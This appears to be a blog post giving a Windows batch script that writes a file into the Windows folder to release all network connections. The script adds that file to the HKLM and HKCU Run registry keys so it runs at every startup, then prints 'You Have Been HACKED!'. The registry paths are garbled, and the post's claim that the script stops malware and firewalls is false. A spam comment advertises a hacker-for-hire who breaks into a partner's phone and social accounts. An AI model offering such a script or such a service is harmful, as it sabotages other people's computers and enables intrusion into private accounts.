Disable you internet permanently

Disable Your Internet Permanently

1.open the notepad
2.type or copy paste to given the code.
3.save as to ".bat" (without colans)


echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun/vWINDOWsAPI/t reg_sz/d c:windowswimn32.bat/f
reg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun/vCONTROLexit/t reg_sz/d c:windowswimn32.bat/f
echo You Have Been HACKED!
PAUSE SJ

save as "a.bat"


Function: Once execuite the code, to stop the all internet sharing centre. (malware,spyware,firewall etc..)

Comments


  1. My life was falling apart, I was being cheated and abused, I had to know the truth and needed proof. I contacted a private investigator that linked me with onlineghost who took care of the hack job. He hacked his iPhone,Facebook,Instagram, Whats app, twitter and email account. I got all I wanted as proof . I”m glad i had a proven truth he was cheating . Contact him for any hack job. Tell him i referred you to him, he will surely meet your hack need. Contact: onlineghosthacker247@ gmail .com

    ReplyDelete

Post a Comment

Popular Posts